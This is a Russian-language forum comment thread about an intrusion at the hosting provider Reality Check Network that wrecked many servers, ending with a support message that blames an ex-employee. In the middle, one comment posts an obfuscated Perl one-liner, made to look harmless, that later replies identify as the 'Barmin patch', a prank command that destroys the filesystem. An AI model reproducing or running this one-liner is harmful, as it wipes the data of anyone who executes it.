Search
Write a publication
Pull to refresh

Comments 47

Вполне очевидно что это работа каких-то кибер-спецслужб — данная работа им вполне по плечу, поскольку у них наверняка всегда на крючке несколько хакеров, попавшихся на чем-нибудь и удостоенных «чести» отстаивать «интересы нации в киберпространстве» в обмен на свободу. Уж очень направленно выглядит атака.
По-моему вы слишком много смотрели телевизор ;)
Хакеры на крючке, кибер-спецслужбы, работа по плечу, обмен на свободу…
Открою по секрету — комментарий был заказан ЦРУ :)
ок отметил у себя, DangerT продажная мусарня
Грубить и переходить на личности — не лучший способ применения своих умственных способностей. Такие комментарии обычно оставляют незрелые школьники и прочий контингент, чей уровень интеллектуального развития оставляет желать лучшего :)
А ещё взлом может иметь целью вызвать в людях мнение, что это работа кибер-спецслужб.
А ваш комментарий может иметь целью заставить людей думать, что этот взлом имел собой целью вызвать в людях мнение что это работа кибер-спецслужб
А ваш комментарий может иметь целью заставить людей думать, что мой комментарий имел целью заставить людей думать, что этот взлом имел целью вызвать в людях мнение что это работа кибер-спецслужб.
Так можно и до StackOverflowException дописаться :)
уж очень интересно звучит «повредив при этом их операционные системы»… это как?… у них у всех стояла одна и та же система с одной и той же уязвимостью?… что за бред?!
Я понимаю, снести только пару серваков, но что б ввесь датацентр?!?!

Вот к примеру, как я вижу, на их серваке выдает:
Apache/2.2.3 (CentOS) Server at www.realitychecknetwork.com Port 80

Сомниваюсь, что у них всех стоит та же сборка CentOS, а не дебиан, и др.
вообще было бы бредом ставить разные ОС. Можете конечно сделать 100 серваков на 100 разных сборках, нанять 100 админов и платить им в 100 раз больше. Всегда сколько видел любые полные стойки в них всегда стоят одинаковые до байта, разлитые по сети с одного образа, оси. И это чертовски логично и выгодно по обслуживанию.
а почему не держать хоть несколько резервных корневых серваков, как раз с разными системами. что бы хоть тот же www.realitychecknetwork.com был в состоянии сейчас выдавать клиентам морду с веселенькой картинкой картинкой и оперативной инфой по аварии?
Нормальные конторы держат резервирование на других платформах, причём даже географически разнося серваки, это вероятно не их уровень.
UFO landed and left these words here
Если наличествует факт удавшейся атаки, то обычно не рискуют. Грамотно заложенные скрипты могут лежать очень глубоко и надежно. Вычистить все в условиях жесткого цейтнота — по меньшей мере самонадеянно. Другое дело, что уже сами бекапы могут быть уже ломанными.

А вообще, не совсем понятен мотив взломщиков. С одной стороны провернуть сложную операцию (а я не сомневаюсь, что эти сервера были надежно защищены) и с другой — так лохануться, засветив все и вся.

Ну либо это была акция конкурентов, в плане черного пиара данного хостинга.
Скорее всего акция уже закончена и надо заметать следы. Вот они их и зачистят — руками своих же врагов.
Дело не в том, что они нашли какую-то уязвимость в операционной системе, а взломали именно сеть хостинга и возможно через какую-то единую систему управления серверами получили доступ ко всем серверам. А затем «повредили»(что конкретно имеется в виду я не знаю) данные на этих серверах. Поэтому конкретный тип операционной системы тут ни при чем.
Сервера пострадали рандомно, ко многим сейчас закрыт доступ, будет интересно узнать что да как, так как мы их клиенты и теперь недоступны больше половины серверов, на них закрыт ssh, а некоторых и вообще не видно.
ОС которые они использовали CentOS/Fedora.
Сочувствую, но глядя на соседей, я бы не стал хоститься на таком хостинге.
Не в моей юрисдикции выбор. Могу только сказать, что при полной поддержке, они хорошо с этим справляются.
+ хостится понятие ведь разное, мы ведь не на одном сервере, у нас сервера свои, что там за соседе на стойке нам все равно :)
Очень странно звучит — это тоже странно. Обычный взлом, кладут сервер и портят записи на винте — чтобы просто не поднимался, либо через recovery.
вообще вспомнилась недавняя DDoS атака на некий adult сайт, не так давно обсуждавшаяся на хабре — пожет некая группа таким образом пробует свои силы, делает разминку перед какими-то масштабными вещами?
не знал, обсуждение помню, тогда писали что атака прекратилась, а как у них сейчас не интересовался, спасибо за информацию)
Вычитал там что атака доросла до 300Гб и ее все же смогли отбить какие то антиддосеры
Ничего там не выросло. )))
Просто горе анти-ддосер хочет поднять себе карму после фейла с этой атакой.
ddos в 100ггбит там не особо страшен, зная ширину их канала
Я думаю это совершенно не причем.
Желтовато получилось, у чуваков просто бэкдоры через какую-нить уязвимость в php скриптах одного из клиентов. Да, и это были обязательно ZOG/ФСБ/ЦРУ/Цыгане с медведем итд.
Ну бекдор, захватят один сервер, дальше как централизированно все положить?
Ходили же желтоватые слухи про какой-то передел рынка adult. Может быть, не такие уж и желтоватые?
Ну а чего еще можно было ждать, когда хостить столько «неугодных» сайтов?
echo «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Патч Бармина, товарищ? Желаете посмотреть сколько ещё серваков сляжет?
минусующие в карму походу попробовали запустить. эх. молодежь.
Часть анонимусов на ЛОРе тогда тоже не оценили и очень обиделись.
Суровый хакер — уборщица с сильным магнитом :)
Бывший админ, небось, обиделся… Такие мощные фейлы — это всегда инсайд.
Вот какое сообщение получили от их суппорта:
We've been working on finalizing the restore process and automating it with scripts so that we can get the servers online as rapidly as possible. We are creating work queues and assigning servers to them therefore we will be able to provide a more concrete ETA for restores shortly.

We are also in the process of finalizing agreements that will allow us to increase manpower significantly as well as provide a stable infrastructure when the servers are restored.

In terms of the damage to the servers it was corruption of the MBR and initial sectors on the hard drive. For customers with large attached storage devices your content should be unaffected as it was not part of the primary RAID configuration.

As for the intrusion it was the result of an ex-employee who was with us for three years as a result he had intimate knowledge of our systems which is why the effects are so large.

We have made significant progress on the backend and we feel that we are reaching a point where the recovery process can begin ramping up full force. We will be sending another update soon, and thanks again to everyone for the outpouring of support — we're working as hard and smart as we can to get everyone back online.

Thank you,
Moisey Uretsky
Reality Check Network
Вот и прояснилось, как выше заметили, такая атака без вмешательства нынешних или бывших работников маловероятна.
Многие компании с большим количеством серверов часто используют скрипты синхронизации ключей. Так что скорей всего человек получил доступ к служебному серверу, добавил свой ключик в список и запустил скрип.
Что-то слабо я представляю, что «несколько очень крупных adult и торрент (включая torrents.net) сайтов» хостились на веб хостинге, а не имели свои дедики. А если имели свои дедики, то у хостера паролей от них быть не должно.
Вы знакомы с понятием managed dedicated servers?
Вы знаете разницу между managed dedicated servers и collocation servers?
Reality Check Network в знаменит в первую очередь своим мощным CDN, список пострадавших сайтов можно посмотреть тут: serversiders.com/as46652

Представители хостинга на закрытом форуме говорят, что взлом был совершён при участии бывшего сотрудника, который имел доступ к конфиденциальным данным по безопасности, отсюда и масштабы.
Sign up to leave a comment.

Articles